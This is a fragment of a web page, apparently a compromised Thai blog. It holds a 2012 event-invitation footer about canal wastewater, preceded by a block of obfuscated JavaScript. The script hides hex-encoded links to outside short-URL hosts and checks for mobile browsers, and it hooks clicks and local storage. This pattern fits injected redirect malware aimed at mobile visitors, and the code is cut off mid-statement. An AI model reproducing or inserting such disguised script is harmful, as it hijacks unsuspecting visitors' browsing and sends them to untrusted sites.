','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x69\x75\x4d\x31\x63\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x75\x64\x6a\x34\x63\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x6b\x75\x74\x6c\x6c\x79\x2e\x63\x6f\x6d\x2f\x68\x65\x75\x39\x63\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const ...

  Posted at February 28, 2012 | By : | Categories : All,Events | Comments Off on ขอเชิญร่วมเสวนาเรื่อง “การจัดการปัญหาน้ำเสียในคลองสาธารณะ”